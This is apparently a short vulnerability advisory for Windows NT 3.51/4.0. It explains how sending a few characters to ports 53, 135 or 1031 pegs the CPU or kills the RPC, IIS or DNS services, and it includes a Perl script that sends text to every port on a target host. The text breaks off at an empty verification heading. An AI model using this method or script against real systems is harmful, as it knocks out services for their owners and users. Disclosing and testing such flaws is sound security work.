NT Versions Affected:
3.51, 4.0
Problem:
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
The following steps;
- Telnet to an NT 4.0 system on port 135
- Type about 10 characters followed by a <CR>
- Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";
$systemname = $ARGV[0] && shift;
$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
}
$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
}
chat::close($fh);
}
/*end poke code*/
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
Verification: